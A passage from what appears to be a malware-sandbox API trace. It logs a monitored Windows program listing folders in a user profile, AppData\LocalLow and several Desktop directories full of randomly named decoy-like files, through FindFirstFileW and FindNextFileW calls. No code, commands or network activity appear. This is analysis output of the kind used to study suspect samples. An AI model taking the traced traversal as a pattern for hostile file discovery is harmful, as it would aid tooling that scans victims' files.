returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b908 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac52b8 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b970 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac5310 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac5368 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b5c8 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b630 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d010 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0143.004] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.004] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.004] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0143.004] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0143.004] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.004] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.004] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.004] PathFindFileNameW (pszPath="") returned="" [0143.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3280a80 | out: hHeap=0x620000) returned 1 [0143.005] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.005] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0143.005] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0143.005] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0143.005] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0143.005] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b630 | out: hHeap=0x620000) returned 1 [0143.005] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.005] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9wq3-\\") returned="9wq3-\\" [0143.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0143.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.005] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.005] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.005] PathFindFileNameW (pszPath="") returned="" [0143.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9wq3-\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x379f7f90, ftCreationTime.dwHighDateTime=0x1d5e43f, ftLastAccessTime.dwLowDateTime=0xceff4710, ftLastAccessTime.dwHighDateTime=0x1d5e7de, ftLastWriteTime.dwLowDateTime=0xceff4710, ftLastWriteTime.dwHighDateTime=0x1d5e7de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b5c8 | out: hHeap=0x620000) returned 1 [0143.006] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x379f7f90, ftCreationTime.dwHighDateTime=0x1d5e43f, ftLastAccessTime.dwLowDateTime=0xceff4710, ftLastAccessTime.dwHighDateTime=0x1d5e7de, ftLastWriteTime.dwLowDateTime=0xceff4710, ftLastWriteTime.dwHighDateTime=0x1d5e7de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.006] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x829f7e20, ftCreationTime.dwHighDateTime=0x1d5e10e, ftLastAccessTime.dwLowDateTime=0x781fab00, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0x781fab00, ftLastWriteTime.dwHighDateTime=0x1d5dbe6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1LOCqfzO6Nzz_c30FwG", cAlternateFileName="1LOCQF~1")) returned 1 [0143.006] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x846e91b0, ftCreationTime.dwHighDateTime=0x1d5e7c5, ftLastAccessTime.dwLowDateTime=0xadc19aa0, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0xadc19aa0, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0x1634c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J-ixo_uo.pdf", cAlternateFileName="")) returned 1 [0143.006] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3780600, ftCreationTime.dwHighDateTime=0x1d5dfe5, ftLastAccessTime.dwLowDateTime=0x6af405c0, ftLastAccessTime.dwHighDateTime=0x1d5e6f9, ftLastWriteTime.dwLowDateTime=0x6af405c0, ftLastWriteTime.dwHighDateTime=0x1d5e6f9, nFileSizeHigh=0x0, nFileSizeLow=0xffd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jEM3b8wAXCeQ9R.ods", cAlternateFileName="JEM3B8~1.ODS")) returned 1 [0143.006] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x428e43c0, ftCreationTime.dwHighDateTime=0x1d5e68b, ftLastAccessTime.dwLowDateTime=0x5f4efdc0, ftLastAccessTime.dwHighDateTime=0x1d5e559, ftLastWriteTime.dwLowDateTime=0x5f4efdc0, ftLastWriteTime.dwHighDateTime=0x1d5e559, nFileSizeHigh=0x0, nFileSizeLow=0xc1be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mIK_S3vW.m4a", cAlternateFileName="")) returned 1 [0143.006] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6399d710, ftCreationTime.dwHighDateTime=0x1d5da46, ftLastAccessTime.dwLowDateTime=0x1ab7f860, ftLastAccessTime.dwHighDateTime=0x1d5e26b, ftLastWriteTime.dwLowDateTime=0x1ab7f860, ftLastWriteTime.dwHighDateTime=0x1d5e26b, nFileSizeHigh=0x0, nFileSizeLow=0x140d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wuw_NLQV7u5cVT.avi", cAlternateFileName="WUW_NL~1.AVI")) returned 1 [0143.006] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6399d710, ftCreationTime.dwHighDateTime=0x1d5da46, ftLastAccessTime.dwLowDateTime=0x1ab7f860, ftLastAccessTime.dwHighDateTime=0x1d5e26b, ftLastWriteTime.dwLowDateTime=0x1ab7f860, ftLastWriteTime.dwHighDateTime=0x1d5e26b, nFileSizeHigh=0x0, nFileSizeLow=0x140d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wuw_NLQV7u5cVT.avi", cAlternateFileName="WUW_NL~1.AVI")) returned 0 [0143.006] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b630 | out: hHeap=0x620000) returned 1 [0143.006] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\muufurbDd2RM8\\") returned="muufurbDd2RM8\\" [0143.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0143.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.006] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.006] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.006] PathFindFileNameW (pszPath="") returned="" [0143.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\muufurbDd2RM8\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50be22d0, ftCreationTime.dwHighDateTime=0x1d5dc9a, ftLastAccessTime.dwLowDateTime=0x5efc46c0, ftLastAccessTime.dwHighDateTime=0x1d5e491, ftLastWriteTime.dwLowDateTime=0x5efc46c0, ftLastWriteTime.dwHighDateTime=0x1d5e491, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281188 | out: hHeap=0x620000) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50be22d0, ftCreationTime.dwHighDateTime=0x1d5dc9a, ftLastAccessTime.dwLowDateTime=0x5efc46c0, ftLastAccessTime.dwHighDateTime=0x1d5e491, ftLastWriteTime.dwLowDateTime=0x5efc46c0, ftLastWriteTime.dwHighDateTime=0x1d5e491, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d018ef0, ftCreationTime.dwHighDateTime=0x1d5dd42, ftLastAccessTime.dwLowDateTime=0xf95fbb80, ftLastAccessTime.dwHighDateTime=0x1d5dbb2, ftLastWriteTime.dwLowDateTime=0xf95fbb80, ftLastWriteTime.dwHighDateTime=0x1d5dbb2, nFileSizeHigh=0x0, nFileSizeLow=0x383c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6a-_dlJfyvYhn0X.mkv", cAlternateFileName="6A-_DL~1.MKV")) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95bcbab0, ftCreationTime.dwHighDateTime=0x1d5d7d4, ftLastAccessTime.dwLowDateTime=0x4c0141c0, ftLastAccessTime.dwHighDateTime=0x1d5d7de, ftLastWriteTime.dwLowDateTime=0x4c0141c0, ftLastWriteTime.dwHighDateTime=0x1d5d7de, nFileSizeHigh=0x0, nFileSizeLow=0x3d73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bOCz89a.wav", cAlternateFileName="")) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69438720, ftCreationTime.dwHighDateTime=0x1d5d7c5, ftLastAccessTime.dwLowDateTime=0xa4602f50, ftLastAccessTime.dwHighDateTime=0x1d5e74e, ftLastWriteTime.dwLowDateTime=0xa4602f50, ftLastWriteTime.dwHighDateTime=0x1d5e74e, nFileSizeHigh=0x0, nFileSizeLow=0x14191, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="na7Wj-Zro.bmp", cAlternateFileName="NA7WJ-~1.BMP")) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e575ea0, ftCreationTime.dwHighDateTime=0x1d5df63, ftLastAccessTime.dwLowDateTime=0xc0a1a240, ftLastAccessTime.dwHighDateTime=0x1d5dbcb, ftLastWriteTime.dwLowDateTime=0xc0a1a240, ftLastWriteTime.dwHighDateTime=0x1d5dbcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Plt4T0i7BVpbcqiV UO", cAlternateFileName="PLT4T0~1")) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea012ce0, ftCreationTime.dwHighDateTime=0x1d5dae1, ftLastAccessTime.dwLowDateTime=0xb8e9e1d0, ftLastAccessTime.dwHighDateTime=0x1d5dc1f, ftLastWriteTime.dwLowDateTime=0xb8e9e1d0, ftLastWriteTime.dwHighDateTime=0x1d5dc1f, nFileSizeHigh=0x0, nFileSizeLow=0x187dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_WaPa1ijz3mrbV.gif", cAlternateFileName="Y_WAPA~1.GIF")) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x142392f0, ftCreationTime.dwHighDateTime=0x1d5d9a3, ftLastAccessTime.dwLowDateTime=0xf6613100, ftLastAccessTime.dwHighDateTime=0x1d5deb1, ftLastWriteTime.dwLowDateTime=0xf6613100, ftLastWriteTime.dwHighDateTime=0x1d5deb1, nFileSizeHigh=0x0, nFileSizeLow=0x11736, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zJOcCtA4qpujCFaby.avi", cAlternateFileName="ZJOCCT~1.AVI")) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c76c20, ftCreationTime.dwHighDateTime=0x1d5dfa2, ftLastAccessTime.dwLowDateTime=0x2d8061d0, ftLastAccessTime.dwHighDateTime=0x1d5dd9d, ftLastWriteTime.dwLowDateTime=0x2d8061d0, ftLastWriteTime.dwHighDateTime=0x1d5dd9d, nFileSizeHigh=0x0, nFileSizeLow=0x6dd1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_oB0c.wav", cAlternateFileName="")) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c76c20, ftCreationTime.dwHighDateTime=0x1d5dfa2, ftLastAccessTime.dwLowDateTime=0x2d8061d0, ftLastAccessTime.dwHighDateTime=0x1d5dd9d, ftLastWriteTime.dwLowDateTime=0x2d8061d0, ftLastWriteTime.dwHighDateTime=0x1d5dd9d, nFileSizeHigh=0x0, nFileSizeLow=0x6dd1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_oB0c.wav", cAlternateFileName="")) returned 0 [0143.007] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3280a80 | out: hHeap=0x620000) returned 1 [0143.007] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.007] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o n2-l40PliXZ0b5\\") returned="o n2-l40PliXZ0b5\\" [0143.007] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0143.007] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.007] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.007] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.007] PathFindFileNameW (pszPath="") returned="" [0143.008] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o n2-l40PliXZ0b5\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2243380, ftCreationTime.dwHighDateTime=0x1d5de02, ftLastAccessTime.dwLowDateTime=0x9d82b660, ftLastAccessTime.dwHighDateTime=0x1d5d909, ftLastWriteTime.dwLowDateTime=0x9d82b660, ftLastWriteTime.dwHighDateTime=0x1d5d909, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6818f8 | out: hHeap=0x620000) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2243380, ftCreationTime.dwHighDateTime=0x1d5de02, ftLastAccessTime.dwLowDateTime=0x9d82b660, ftLastAccessTime.dwHighDateTime=0x1d5d909, ftLastWriteTime.dwLowDateTime=0x9d82b660, ftLastWriteTime.dwHighDateTime=0x1d5d909, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbdd0b0, ftCreationTime.dwHighDateTime=0x1d5ddcb, ftLastAccessTime.dwLowDateTime=0xc574a010, ftLastAccessTime.dwHighDateTime=0x1d5e47c, ftLastWriteTime.dwLowDateTime=0xc574a010, ftLastWriteTime.dwHighDateTime=0x1d5e47c, nFileSizeHigh=0x0, nFileSizeLow=0x858f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0mSLlDJEIqT-3-H.mp3", cAlternateFileName="0MSLLD~1.MP3")) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0e8d50, ftCreationTime.dwHighDateTime=0x1d5e36d, ftLastAccessTime.dwLowDateTime=0x643ad100, ftLastAccessTime.dwHighDateTime=0x1d5df33, ftLastWriteTime.dwLowDateTime=0x643ad100, ftLastWriteTime.dwHighDateTime=0x1d5df33, nFileSizeHigh=0x0, nFileSizeLow=0x6d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2pgv8DDbd5lqhPH_UK-.ots", cAlternateFileName="2PGV8D~1.OTS")) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5ac300, ftCreationTime.dwHighDateTime=0x1d5d9cb, ftLastAccessTime.dwLowDateTime=0x489c5680, ftLastAccessTime.dwHighDateTime=0x1d5e4b0, ftLastWriteTime.dwLowDateTime=0x489c5680, ftLastWriteTime.dwHighDateTime=0x1d5e4b0, nFileSizeHigh=0x0, nFileSizeLow=0x176bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3D-DD46lBC_4M20MR_50.mp3", cAlternateFileName="3D-DD4~1.MP3")) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c5fec20, ftCreationTime.dwHighDateTime=0x1d5de5e, ftLastAccessTime.dwLowDateTime=0xd3e215d0, ftLastAccessTime.dwHighDateTime=0x1d5e47a, ftLastWriteTime.dwLowDateTime=0xd3e215d0, ftLastWriteTime.dwHighDateTime=0x1d5e47a, nFileSizeHigh=0x0, nFileSizeLow=0xb452, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b4 Jw.swf", cAlternateFileName="B4JW~1.SWF")) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96afd4e0, ftCreationTime.dwHighDateTime=0x1d5e367, ftLastAccessTime.dwLowDateTime=0xef1d4420, ftLastAccessTime.dwHighDateTime=0x1d5e23e, ftLastWriteTime.dwLowDateTime=0xef1d4420, ftLastWriteTime.dwHighDateTime=0x1d5e23e, nFileSizeHigh=0x0, nFileSizeLow=0x184b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hO07fcg.mp4", cAlternateFileName="")) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f3d8d80, ftCreationTime.dwHighDateTime=0x1d5e7cf, ftLastAccessTime.dwLowDateTime=0x69412d90, ftLastAccessTime.dwHighDateTime=0x1d5e012, ftLastWriteTime.dwLowDateTime=0x69412d90, ftLastWriteTime.dwHighDateTime=0x1d5e012, nFileSizeHigh=0x0, nFileSizeLow=0x8810, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Li7JLKwhSC-SftYbHr.avi", cAlternateFileName="LI7JLK~1.AVI")) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bc680, ftCreationTime.dwHighDateTime=0x1d5e0d9, ftLastAccessTime.dwLowDateTime=0x2a8ee220, ftLastAccessTime.dwHighDateTime=0x1d5d9b6, ftLastWriteTime.dwLowDateTime=0x2a8ee220, ftLastWriteTime.dwHighDateTime=0x1d5d9b6, nFileSizeHigh=0x0, nFileSizeLow=0xc2a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uFLcniyNiYqsy.mp3", cAlternateFileName="UFLCNI~1.MP3")) returned 1 [0143.008] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x536ad7f0, ftCreationTime.dwHighDateTime=0x1d5e25b, ftLastAccessTime.dwLowDateTime=0xaff2e680, ftLastAccessTime.dwHighDateTime=0x1d5e098, ftLastWriteTime.dwLowDateTime=0xaff2e680, ftLastWriteTime.dwHighDateTime=0x1d5e098, nFileSizeHigh=0x0, nFileSizeLow=0x1a39, dwReserved0=0xa0000003, dwReserved1=0x0, 